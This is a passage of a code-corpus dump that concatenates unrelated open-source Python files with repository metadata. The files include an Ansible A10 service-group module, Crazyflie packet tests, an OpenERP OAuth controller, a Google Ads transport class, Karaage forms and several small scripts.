You should have received a copy of the GNU General Public License
along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
DOCUMENTATION = '''
---
module: a10_service_group
version_added: 1.8
short_description: Manage A10 Networks devices' service groups
description:
- Manage slb service-group objects on A10 Networks devices via aXAPI
author: "Mischa Peters (@mischapeters)"
notes:
- Requires A10 Networks aXAPI 2.1
    - When a server doesn't exist and is added to the service-group, the server will be created
options:
host:
description:
- hostname or ip of your A10 Networks device
required: true
default: null
aliases: []
choices: []
username:
description:
- admin account of your A10 Networks device
required: true
default: null
aliases: ['user', 'admin']
choices: []
password:
description:
- admin password of your A10 Networks device
required: true
default: null
aliases: ['pass', 'pwd']
choices: []
service_group:
description:
- slb service-group name
required: true
default: null
aliases: ['service', 'pool', 'group']
choices: []
service_group_protocol:
description:
- slb service-group protocol
required: false
default: tcp
aliases: ['proto', 'protocol']
choices: ['tcp', 'udp']
service_group_method:
description:
- slb service-group loadbalancing method
required: false
default: round-robin
aliases: ['method']
choices: ['round-robin', 'weighted-rr', 'least-connection', 'weighted-least-connection', 'service-least-connection', 'service-weighted-least-connection', 'fastest-response', 'least-request', 'round-robin-strict', 'src-ip-only-hash', 'src-ip-hash']
servers:
description:
- A list of servers to add to the service group. Each list item should be a
dictionary which specifies the C(server:) and C(port:), but can also optionally
specify the C(status:). See the examples below for details.
required: false
default: null
aliases: []
choices: []
write_config:
description:
- If C(yes), any changes will cause a write of the running configuration
to non-volatile memory. This will save I(all) configuration changes,
including those that may have been made manually or through other modules,
so care should be taken when specifying C(yes).
required: false
default: "no"
choices: ["yes", "no"]
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled devices using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
'''
EXAMPLES = '''
# Create a new service-group
- a10_service_group:
host: a10.mydomain.com
username: myadmin
password: mypassword
service_group: sg-80-tcp
servers:
- server: foo1.mydomain.com
port: 8080
- server: foo2.mydomain.com
port: 8080
- server: foo3.mydomain.com
port: 8080
- server: foo4.mydomain.com
port: 8080
status: disabled
'''
VALID_SERVICE_GROUP_FIELDS = ['name', 'protocol', 'lb_method']
VALID_SERVER_FIELDS = ['server', 'port', 'status']
def validate_servers(module, servers):
for item in servers:
for key in item:
if key not in VALID_SERVER_FIELDS:
module.fail_json(msg="invalid server field (%s), must be one of: %s" % (key, ','.join(VALID_SERVER_FIELDS)))
# validate the server name is present
if 'server' not in item:
module.fail_json(msg="server definitions must define the server field")
# validate the port number is present and an integer
if 'port' in item:
try:
item['port'] = int(item['port'])
except:
module.fail_json(msg="server port definitions must be integers")
else:
module.fail_json(msg="server definitions must define the port field")
# convert the status to the internal API integer value
if 'status' in item:
item['status'] = axapi_enabled_disabled(item['status'])
else:
item['status'] = 1
def main():
argument_spec = a10_argument_spec()
argument_spec.update(url_argument_spec())
argument_spec.update(
dict(
state=dict(type='str', default='present', choices=['present', 'absent']),
service_group=dict(type='str', aliases=['service', 'pool', 'group'], required=True),
service_group_protocol=dict(type='str', default='tcp', aliases=['proto', 'protocol'], choices=['tcp', 'udp']),
service_group_method=dict(type='str', default='round-robin',
aliases=['method'],
choices=['round-robin',
'weighted-rr',
'least-connection',
'weighted-least-connection',
'service-least-connection',
'service-weighted-least-connection',
'fastest-response',
'least-request',
'round-robin-strict',
'src-ip-only-hash',
'src-ip-hash']),
servers=dict(type='list', aliases=['server', 'member'], default=[]),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=False
)
host = module.params['host']
username = module.params['username']
password = module.params['password']
state = module.params['state']
write_config = module.params['write_config']
slb_service_group = module.params['service_group']
slb_service_group_proto = module.params['service_group_protocol']
slb_service_group_method = module.params['service_group_method']
slb_servers = module.params['servers']
if slb_service_group is None:
module.fail_json(msg='service_group is required')
axapi_base_url = 'https://' + host + '/services/rest/V2.1/?format=json'
load_balancing_methods = {'round-robin': 0,
'weighted-rr': 1,
'least-connection': 2,
'weighted-least-connection': 3,
'service-least-connection': 4,
'service-weighted-least-connection': 5,
'fastest-response': 6,
'least-request': 7,
'round-robin-strict': 8,
'src-ip-only-hash': 14,
'src-ip-hash': 15}
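    # the aXAPI encodes the service-group protocol numerically: tcp = 2, udp = 3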
if not slb_service_group_proto or slb_service_group_proto.lower() == 'tcp':
protocol = 2
else:
protocol = 3
# validate the server data list structure
validate_servers(module, slb_servers)
json_post = {
'service_group': {
'name': slb_service_group,
'protocol': protocol,
'lb_method': load_balancing_methods[slb_service_group_method],
}
}
# first we authenticate to get a session id
session_url = axapi_authenticate(module, axapi_base_url, username, password)
# then we check to see if the specified group exists
slb_result = axapi_call(module, session_url + '&method=slb.service_group.search', json.dumps({'name': slb_service_group}))
slb_service_group_exist = not axapi_failure(slb_result)
changed = False
if state == 'present':
# before creating/updating we need to validate that servers
# defined in the servers list exist to prevent errors
checked_servers = []
for server in slb_servers:
result = axapi_call(module, session_url + '&method=slb.server.search', json.dumps({'name': server['server']}))
if axapi_failure(result):
module.fail_json(msg="the server %s specified in the servers list does not exist" % server['server'])
checked_servers.append(server['server'])
if not slb_service_group_exist:
result = axapi_call(module, session_url + '&method=slb.service_group.create', json.dumps(json_post))
if axapi_failure(result):
module.fail_json(msg=result['response']['err']['msg'])
changed = True
else:
# check to see if the service group definition without the
# server members is different, and update that individually
# if it needs it
do_update = False
for field in VALID_SERVICE_GROUP_FIELDS:
if json_post['service_group'][field] != slb_result['service_group'][field]:
do_update = True
break
if do_update:
result = axapi_call(module, session_url + '&method=slb.service_group.update', json.dumps(json_post))
if axapi_failure(result):
module.fail_json(msg=result['response']['err']['msg'])
changed = True
# next we pull the defined list of servers out of the returned
# results to make it a bit easier to iterate over
defined_servers = slb_result.get('service_group', {}).get('member_list', [])
# next we add/update new member servers from the user-specified
# list if they're different or not on the target device
for server in slb_servers:
found = False
different = False
for def_server in defined_servers:
if server['server'] == def_server['server']:
found = True
for valid_field in VALID_SERVER_FIELDS:
if server[valid_field] != def_server[valid_field]:
different = True
break
if found or different:
break
# add or update as required
server_data = {
"name": slb_service_group,
"member": server,
}
if not found:
result = axapi_call(module, session_url + '&method=slb.service_group.member.create', json.dumps(server_data))
changed = True
elif different:
result = axapi_call(module, session_url + '&method=slb.service_group.member.update', json.dumps(server_data))
changed = True
# finally, remove any servers that are on the target
# device but were not specified in the list given
for server in defined_servers:
found = False
for slb_server in slb_servers:
if server['server'] == slb_server['server']:
found = True
break
# remove if not found
server_data = {
"name": slb_service_group,
"member": server,
}
if not found:
result = axapi_call(module, session_url + '&method=slb.service_group.member.delete', json.dumps(server_data))
changed = True
# if we changed things, get the full info regarding
# the service group for the return data below
if changed:
result = axapi_call(module, session_url + '&method=slb.service_group.search', json.dumps({'name': slb_service_group}))
else:
result = slb_result
elif state == 'absent':
if slb_service_group_exist:
result = axapi_call(module, session_url + '&method=slb.service_group.delete', json.dumps({'name': slb_service_group}))
changed = True
else:
result = dict(msg="the service group was not present")
# if the config has changed, save the config unless otherwise requested
if changed and write_config:
write_result = axapi_call(module, session_url + '&method=system.action.write_memory')
if axapi_failure(write_result):
module.fail_json(msg="failed to save the configuration: %s" % write_result['response']['err']['msg'])
# log out of the session nicely and exit
axapi_call(module, session_url + '&method=session.close')
module.exit_json(changed=changed, content=result)
# standard ansible module imports
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.a10 import *
main()
|
haad/ansible-modules-extras
|
network/a10/a10_service_group.py
|
Python
|
gpl-3.0
| 13,447
|
"""airports.py provides an example Steno3D project of airports"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from .base import BaseExample, exampleproperty
from ..point import Mesh0D, Point
from ..project import Project
DEG2RAD = np.pi/180
FT2KM = 12*2.54/100/1000
RADIUS = 6371
class Airports(BaseExample):
"""Class containing components of airport project. Components can be
viewed individually or copied into new resources or projects with
get_resources() and get_project(), respectively.
"""
@exampleproperty
def filenames(self):
"""airport files"""
return ['airports.dat', 'latitude.npy', 'longitude.npy',
'altitude.npy', 'license.txt']
@exampleproperty
def datafile(self):
"""full path to airport data file"""
return Airports.fetch_data(filename='airports.dat',
download_if_missing=False,
verbose=False)
@exampleproperty
def latitude(self):
"""Airport lat, degrees, from openflights.org"""
return np.load(Airports.fetch_data(filename='latitude.npy',
download_if_missing=False,
verbose=False))
@exampleproperty
def longitude(self):
"""Airport lon, degrees, from openflights.org"""
return np.load(Airports.fetch_data(filename='longitude.npy',
download_if_missing=False,
verbose=False))
@exampleproperty
def altitude(self):
"""Airport alt, km, from openflights.org"""
return np.load(Airports.fetch_data(filename='altitude.npy',
download_if_missing=False,
verbose=False))
@classmethod
    def get_project(cls):
"""return airport points project"""
proj = Project(
title='Airport',
description='Project with airport points'
)
Point(
project=proj,
mesh=Mesh0D(
                vertices=np.c_[cls.geo_to_xyz(cls.latitude,
                                              cls.longitude,
                                              cls.altitude)]
),
title='Airport Points'
)
return proj
@staticmethod
def geo_to_xyz(lat, lon, alt):
"""function geo_to_xyz
Inputs:
lat: latitude, degrees
lon: longitude, degrees
alt: altitude, km
        Outputs:
            x, y, z: spatial coordinates relative to the center of the earth
        Note:
            This function assumes a spherical earth
        """
        # work on scaled copies so the caller's arrays are not mutated
        lat = lat * DEG2RAD
        lon = lon * DEG2RAD
x = (RADIUS + alt)*np.cos(lat)*np.cos(lon)
y = (RADIUS + alt)*np.cos(lat)*np.sin(lon)
z = (RADIUS + alt)*np.sin(lat)
return x, y, z
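    # Quick sanity check (editorial, not in the original file): a point
    # on the equator at zero longitude and zero altitude lands on the
    # +x axis at one earth radius:
    #
    #   >>> Airports.geo_to_xyz(np.zeros(1), np.zeros(1), np.zeros(1))
    #   (array([ 6371.]), array([ 0.]), array([ 0.]))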
@staticmethod
def read_airports_data(filename):
"""Extract latitude, longitude, and altitude from file"""
lat = [] # Latitude
lon = [] # Longitude
alt = [] # Altitude
with open(filename) as f:
for line in f:
data = line.rstrip().split(',')
lat.append(float(data[6])*DEG2RAD)
lon.append(float(data[7])*DEG2RAD)
alt.append(float(data[8])*FT2KM)
return np.array(lat), np.array(lon), np.array(alt)
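    # Editorial note: unlike the latitude/longitude/altitude properties
    # above, which return degrees and km, this reader already converts
    # to radians (and feet to km), so its output should not be passed
    # through geo_to_xyz, which applies DEG2RAD a second time.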
|
3ptscience/steno3dpy
|
steno3d/examples/airports.py
|
Python
|
mit
| 3,650
|
from lldbsuite.test import lldbinline
from lldbsuite.test import decorators
lldbinline.MakeInlineTest(__file__, globals(), [decorators.skipIf(bugnumber="rdar://53754063")])
|
apple/swift-lldb
|
packages/Python/lldbsuite/test/commands/expression/completion-crash2/TestCompletionCrash2.py
|
Python
|
apache-2.0
| 174
|
__problem_title__ = "Exploring Pascal's triangle"
__problem_url___ = "https://projecteuler.net/problem=148"
__problem_description__ = "We can easily verify that none of the entries in the first seven rows " \
                          "of Pascal's triangle are divisible by 7. However, if we check the " \
                          "first one hundred rows, we will find that only 2361 of the 5050 " \
                          "entries are not divisible by 7. Find the number of entries which are " \
                          "not divisible by 7 in the first one billion (10^9) rows of Pascal's " \
                          "triangle."
import timeit
class Solution():
@staticmethod
def solution1():
pass
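    @staticmethod
    def solution1_sketch():
        # Editorial sketch (not the original author's solution): by
        # Lucas' theorem, C(n, k) is not divisible by 7 exactly when
        # every base-7 digit of k is <= the matching digit of n, so
        # row n contains prod(d + 1) such entries, d ranging over the
        # base-7 digits of n. Summing g(n) = prod(d + 1) over n < N
        # obeys S(7q + r) = 28*S(q) + g(q)*r*(r + 1)//2, which checks
        # out against the 2361 quoted for the first one hundred rows.
        def g(n):
            prod = 1
            while n:
                n, d = divmod(n, 7)
                prod *= d + 1
            return prod
        def count_below(n):
            if n == 0:
                return 0
            q, r = divmod(n, 7)
            return 28 * count_below(q) + g(q) * r * (r + 1) // 2
        return count_below(10 ** 9)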
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
jrichte43/ProjectEuler
|
Problem-0148/solutions.py
|
Python
|
gpl-3.0
| 999
|
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import unittest
from cflib.crtp.crtpstack import CRTPPacket
class CRTPPacketTest(unittest.TestCase):
def setUp(self):
self.callback_count = 0
self.sut = CRTPPacket()
    def test_that_port_and_channel_is_encoded_in_header(self):
# Fixture
self.sut.set_header(2, 1)
# Test
actual = self.sut.get_header()
# Assert
expected = 0x2d
self.assertEqual(expected, actual)
def test_that_port_is_truncated_in_header(self):
# Fixture
port = 0xff
self.sut.set_header(port, 0)
# Test
actual = self.sut.get_header()
# Assert
expected = 0xfc
self.assertEqual(expected, actual)
def test_that_channel_is_truncated_in_header(self):
# Fixture
channel = 0xff
self.sut.set_header(0, channel)
# Test
actual = self.sut.get_header()
# Assert
expected = 0x0f
self.assertEqual(expected, actual)
    def test_that_port_and_channel_is_encoded_in_header_when_set_separately(self):
# Fixture
self.sut.port = 2
self.sut.channel = 1
# Test
actual = self.sut.get_header()
# Assert
expected = 0x2d
self.assertEqual(expected, actual)
def test_that_default_header_is_set_when_constructed(self):
# Fixture
# Test
actual = self.sut.get_header()
# Assert
expected = 0x0c
self.assertEqual(expected, actual)
def test_that_header_is_set_when_constructed(self):
# Fixture
sut = CRTPPacket(header=0x21)
# Test
actual = sut.get_header()
# Assert
self.assertEqual(0x2d, actual)
self.assertEqual(2, sut.port)
self.assertEqual(1, sut.channel)
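
# Editorial note (inferred from the expected values above, not from the
# CRTPPacket source): the header byte appears to pack the port into the
# top nibble, keep bits 2-3 set, and place the channel in the low two bits:
#
#     header = ((port & 0x0f) << 4) | 0x0c | (channel & 0x03)
#
# e.g. port=2, channel=1 gives 0x20 | 0x0c | 0x01 == 0x2d, matching
# test_that_port_and_channel_is_encoded_in_header.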
|
bitcraze/crazyflie-lib-python
|
test/crtp/test_crtpstack.py
|
Python
|
gpl-2.0
| 2,797
|
import cv2
import sys
#import matplotlib.pyplot as pt
import numpy as np
import numpy.linalg as la
import math as mt
#Content of our eigens
# there would be five images of each person
# the columns would be the frob norm of each type
# 4 rows for each person
# 1)Smiling
# 2)Sad
# 3)Serious
# 4)Blank
# 5)If wearing specs then without specs
# 6)looking left
# 7)looking right
#ournorms = {'Abhishek':[5916.56,6155.725,5835.83,6033.245,5922.402,6207.052,6028.91],
#            'Akshay':[6268.704,6335.443,6119.169,6277.252,6126.155,6232.754,6294.937],
#            'Chris':[6479.241,6297.295,6477.624,6463.082,6385.727,6275.596,6200.595],
#            'Tim':[6507.45,6569.225,6637.975,6731.95,6546.934,6239.888,6529.477]}
ournorms = {'Abhishek':[5866.278,6229.924,6123.536,5988.862,5966.183,5990.367,5661.118],
            'Akshay':[6748.139,5658.617,6238.200,6671.678,6228.899,6167.573,5830.901],
            'Chris':[6312.924,6374.821,6465.274,6275.596,6596.240,6382.099,6456.81],  # left right serious
            'Tim':[6226.022,6010.737,6107.618,6107.386,5994.380,5916.834,7052.43]}
indbuffervals = {'Abhishek':100,
                 'Akshay':100,
                 'Chris':50,
                 'Tim':150}
#hardcode values into ournorms above
imagePath = sys.argv[1]

def recognizeFace(image, faces):
    retval = True
    if(len(faces) > 10):
        print("too many faces to check, giving up")
        return True, 100
    for i in range(faces.shape[0]):
        x, y, w, h = faces[i]
        # pad each detected box out to roughly 400x400 before checking it
        bufw = (400 - w)//2
        bufh = (400 - h)//2
        inmod = image[y-bufw:y+w+bufw, x-bufh:x+h+bufh]
        retwhat = checker(inmod)
        retval = retwhat and retval
    return retval, len(faces)

def checker(inmod):
    tempnorm = la.norm(inmod)
    retval = False
    for name, val in ournorms.items():
        for j in val:
            if(np.abs(j - tempnorm) < indbuffervals[name]):
                retval = True
                print("is")
                print(name)
                break
        if(retval):
            break
    if(not retval):
        # note: reports the last name checked
        print("not")
        print(name)
    return retval

# Get values from command line
def check(image):
    #cascPath = sys.argv[2]
    imagePath = image
    cascPath = "haarcascade_frontalface_default.xml"
    # Create the haar cascade
    faceCascade = cv2.CascadeClassifier(cascPath)
    # Read the image
    image = cv2.imread(imagePath)
    imnonmod = cv2.imread(imagePath)
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # Detect faces in the image
    faces = faceCascade.detectMultiScale(
        gray,
        scaleFactor=1.25,
        minNeighbors=5,
        minSize=(40, 40)
    )
    print("Found {0} faces!".format(len(faces)))
    # Draw a rectangle around the faces
    for (x, y, w, h) in faces:
        cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
    what = True
    if(len(faces) > 0):
        what, number = recognizeFace(image, faces)
    # return what to the arduino
    if(what is False):
        print("intruder detected")
    cv2.imshow("Faces found", image)
    #cv2.waitKey(0)
    return what

check(imagePath)
|
timothyong/hackillinois
|
face_recognition.py
|
Python
|
mit
| 5,724
|
import functools
import logging
import simplejson
import werkzeug.utils
from werkzeug.exceptions import BadRequest
import openerp
from openerp import SUPERUSER_ID
import openerp.addons.web.http as oeweb
from openerp.addons.web.controllers.main import db_monodb, set_cookie_and_redirect, login_and_redirect
from openerp.modules.registry import RegistryManager
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# helpers
#----------------------------------------------------------
def fragment_to_query_string(func):
@functools.wraps(func)
def wrapper(self, req, **kw):
if not kw:
return """<html><head><script>
var l = window.location;
var q = l.hash.substring(1);
var r = '/' + l.search;
if(q.length !== 0) {
var s = l.search ? (l.search === '?' ? '' : '&') : '?';
r = l.pathname + l.search + s + q;
}
window.location = r;
</script></head><body></body></html>"""
return func(self, req, **kw)
return wrapper
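
# Editorial example of what the helper above does (illustrative URL):
# an OAuth provider redirecting the browser to
#     /auth_oauth/signin#state=...&access_token=abc
# is bounced once through the returned HTML so the request comes back as
#     /auth_oauth/signin?state=...&access_token=abc
# at which point kw is non-empty and the wrapped handler runs.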
#----------------------------------------------------------
# Controller
#----------------------------------------------------------
class OAuthController(oeweb.Controller):
_cp_path = '/auth_oauth'
@oeweb.jsonrequest
def list_providers(self, req, dbname):
try:
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
providers = registry.get('auth.oauth.provider')
l = providers.read(cr, SUPERUSER_ID, providers.search(cr, SUPERUSER_ID, [('enabled', '=', True)]))
except Exception:
l = []
return l
@oeweb.httprequest
@fragment_to_query_string
def signin(self, req, **kw):
state = simplejson.loads(kw['state'])
dbname = state['d']
provider = state['p']
context = state.get('c', {})
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
try:
u = registry.get('res.users')
credentials = u.auth_oauth(cr, SUPERUSER_ID, provider, kw, context=context)
cr.commit()
action = state.get('a')
menu = state.get('m')
url = '/'
if action:
url = '/#action=%s' % action
elif menu:
url = '/#menu_id=%s' % menu
return login_and_redirect(req, *credentials, redirect_url=url)
except AttributeError:
# auth_signup is not installed
_logger.error("auth_signup not installed on database %s: oauth sign up cancelled." % (dbname,))
url = "/#action=login&oauth_error=1"
except openerp.exceptions.AccessDenied:
# oauth credentials not valid, user could be on a temporary session
_logger.info('OAuth2: access denied, redirect to main page in case a valid session exists, without setting cookies')
url = "/#action=login&oauth_error=3"
redirect = werkzeug.utils.redirect(url, 303)
redirect.autocorrect_location_header = False
return redirect
except Exception, e:
# signup error
_logger.exception("OAuth2: %s" % str(e))
url = "/#action=login&oauth_error=2"
return set_cookie_and_redirect(req, url)
@oeweb.httprequest
def oea(self, req, **kw):
"""login user via OpenERP Account provider"""
dbname = kw.pop('db', None)
if not dbname:
dbname = db_monodb(req)
if not dbname:
return BadRequest()
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
IMD = registry['ir.model.data']
try:
model, provider_id = IMD.get_object_reference(cr, SUPERUSER_ID, 'auth_oauth', 'provider_openerp')
except ValueError:
return set_cookie_and_redirect(req, '/?db=%s' % dbname)
assert model == 'auth.oauth.provider'
state = {
'd': dbname,
'p': provider_id,
'c': {'no_user_creation': True},
}
kw['state'] = simplejson.dumps(state)
return self.signin(req, **kw)
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
inovtec-solutions/OpenERP
|
openerp/addons/auth_oauth/controllers/main.py
|
Python
|
agpl-3.0
| 4,484
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
import google.auth # type: ignore
from google.api_core import gapic_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.ads.googleads.v9.resources.types import feed_item_set_link
from google.ads.googleads.v9.services.types import feed_item_set_link_service
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-ads",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class FeedItemSetLinkServiceTransport(metaclass=abc.ABCMeta):
"""Abstract transport class for FeedItemSetLinkService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precomputed wrapped methods
self._wrapped_methods = {
self.get_feed_item_set_link: gapic_v1.method.wrap_method(
self.get_feed_item_set_link,
default_timeout=None,
client_info=client_info,
),
self.mutate_feed_item_set_links: gapic_v1.method.wrap_method(
self.mutate_feed_item_set_links,
default_timeout=None,
client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def get_feed_item_set_link(
self,
) -> typing.Callable[
[feed_item_set_link_service.GetFeedItemSetLinkRequest],
feed_item_set_link.FeedItemSetLink,
]:
raise NotImplementedError
@property
def mutate_feed_item_set_links(
self,
) -> typing.Callable[
[feed_item_set_link_service.MutateFeedItemSetLinksRequest],
feed_item_set_link_service.MutateFeedItemSetLinksResponse,
]:
raise NotImplementedError
__all__ = ("FeedItemSetLinkServiceTransport",)
|
googleads/google-ads-python
|
google/ads/googleads/v9/services/services/feed_item_set_link_service/transports/base.py
|
Python
|
apache-2.0
| 4,414
|
# -*- coding: UTF-8 -*-
# File: naming.py
# Author: Yuxin Wu <ppwwyyxx@gmail.com>
GLOBAL_STEP_OP_NAME = 'global_step'
GLOBAL_STEP_VAR_NAME = 'global_step:0'
# extra variables to summarize during training in a moving-average way
MOVING_SUMMARY_VARS_KEY = 'MOVING_SUMMARY_VARIABLES'
# placeholders for input variables
INPUT_VARS_KEY = 'INPUT_VARIABLES'
# variables that need to be saved for inference, apart from trainable variables
EXTRA_SAVE_VARS_KEY = 'EXTRA_SAVE_VARIABLES'
import tensorflow as tf
SUMMARY_BACKUP_KEYS = [tf.GraphKeys.SUMMARIES, MOVING_SUMMARY_VARS_KEY]
# export all upper case variables
all_local_names = locals().keys()
__all__ = [x for x in all_local_names if x.isupper()]
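
# Editorial example: after `from naming import *`, constants such as
# GLOBAL_STEP_OP_NAME and SUMMARY_BACKUP_KEYS are importable, while
# lower-case helpers like all_local_names are filtered out, since
# __all__ keeps only the upper-case names.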
|
yinglanma/AI-project
|
tensorpack/utils/naming.py
|
Python
|
apache-2.0
| 700
|
# -*- coding: UTF-8 -*-
"""
Unit tests for :class:`click_configfile.ConfigFileReader`.
"""
from __future__ import absolute_import
import os.path
# -----------------------------------------------------------------------------
# TEST SUPPORT
# -----------------------------------------------------------------------------
def write_configfile_with_contents(filename, contents, encoding=None):
encoding = encoding or "UTF-8"
dirname = os.path.dirname(filename) or "."
if not os.path.isdir(dirname):
os.makedirs(dirname)
# PREPARED: with open(filename, "w", encoding=encoding) as config_file:
with open(filename, "w") as config_file:
config_file.write(contents)
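
# Illustrative use (editorial; the path is made up):
#   write_configfile_with_contents("tmp/hello.ini", "[hello]\nname = world\n")
# creates tmp/ on demand and writes the contents verbatim.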
|
jenisys/click-configfile
|
tests/_test_support.py
|
Python
|
bsd-3-clause
| 698
|
# Copyright 2015 VPAC
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import six
from django import forms
from django.conf import settings
from karaage.people.models import Group
from karaage.machines.models import Machine
from .models import SoftwareCategory, Software
from .models import SoftwareVersion, SoftwareLicense
class SoftwareForm(forms.ModelForm):
category = forms.ModelChoiceField(queryset=None)
name = forms.CharField()
description = forms.CharField(required=False, widget=forms.Textarea())
homepage = forms.URLField(required=False)
tutorial_url = forms.URLField(required=False)
academic_only = forms.BooleanField(required=False)
restricted = forms.BooleanField(required=False,
help_text="Will require admin approval")
def __init__(self, *args, **kwargs):
super(SoftwareForm, self).__init__(*args, **kwargs)
self.fields['category'].queryset = SoftwareCategory.objects.all()
class Meta:
model = Software
fields = [
'category', 'name', 'description', 'homepage', 'tutorial_url',
'academic_only', 'restricted',
]
class AddPackageForm(SoftwareForm):
group_name = forms.RegexField(
"^%s$" % settings.GROUP_VALIDATION_RE,
required=True,
error_messages={'invalid': settings.GROUP_VALIDATION_ERROR_MSG})
version = forms.CharField()
module = forms.CharField(required=False)
machines = forms.ModelMultipleChoiceField(queryset=None)
license_version = forms.CharField(required=False)
license_date = forms.DateField(required=False)
license_text = forms.CharField(required=False, widget=forms.Textarea())
def __init__(self, *args, **kwargs):
super(AddPackageForm, self).__init__(*args, **kwargs)
self.fields['machines'].queryset = Machine.active.all()
def clean(self):
data = self.cleaned_data
        if data.get('license_version'):
            if not data.get('license_date') or not data.get('license_text'):
                raise forms.ValidationError(
                    six.u('You must specify all fields in the license section')
                )
return data
def save(self, commit=True):
assert commit is True
data = self.cleaned_data
software = super(AddPackageForm, self).save(commit=False)
name = self.cleaned_data['group_name']
software.group, _ = Group.objects.get_or_create(name=name)
software.save()
version = SoftwareVersion(
software=software,
version=data['version'],
module=data['module'],
)
version.save()
version.machines = data['machines']
version.save()
if data['license_version']:
SoftwareLicense.objects.create(
software=software,
version=data['license_version'],
date=data['license_date'],
text=data['license_text'],
)
return software
class LicenseForm(forms.ModelForm):
class Meta:
model = SoftwareLicense
fields = ['software', 'version', 'date', 'text']
class SoftwareVersionForm(forms.ModelForm):
class Meta:
model = SoftwareVersion
fields = ['software', 'version', 'machines', 'module', 'last_used']
class SoftwareCategoryForm(forms.ModelForm):
class Meta:
model = SoftwareCategory
fields = [
'name',
]
|
Karaage-Cluster/karaage-debian
|
karaage/plugins/kgsoftware/forms.py
|
Python
|
gpl-3.0
| 4,299
|
import sys
#sys.path.append('/home/candice/Documents/xxx/music21-1.9.3/music21')
#Alternative: Terminal: cd <path of the folder> then sudo setup.py install
# import PyQt4 QtCore module
from PyQt4.QtCore import *
from music21 import *
#Import and parse an XML file (Example from http://web.mit.edu/music21/)
#sBach = converter.parse('/home/candice/Documents/xxx/Concept Elbums/Archive/Sarisiphirilla/noAbsolution/NoAbsolution.mscz.xml')
#sBach.show('text')
#show melody in musical notation, also works with a MIDI file or XML file as shown above
#converter.parse("tinynotation: 3/4 c4 d8 f g16 a g f#").show()
#Converting a file from whatever notation to XML
#converter.parse('/users/.../docs/composition.etc').write('musicxml')
converter.parse("lilypond: c' e' g' a' c'").write('musicxml')
#FileDump =
converter.parse('/home/candice/Documents/xxx/Concept Elbums/Archive/Sarisiphirilla/noAbsolution/NoAbsolution.mscz.xml')
|
Can123dice/Revisionista
|
main.py
|
Python
|
gpl-2.0
| 935
|
from bs4 import BeautifulSoup
import requests
from random import choice
from io import BytesIO
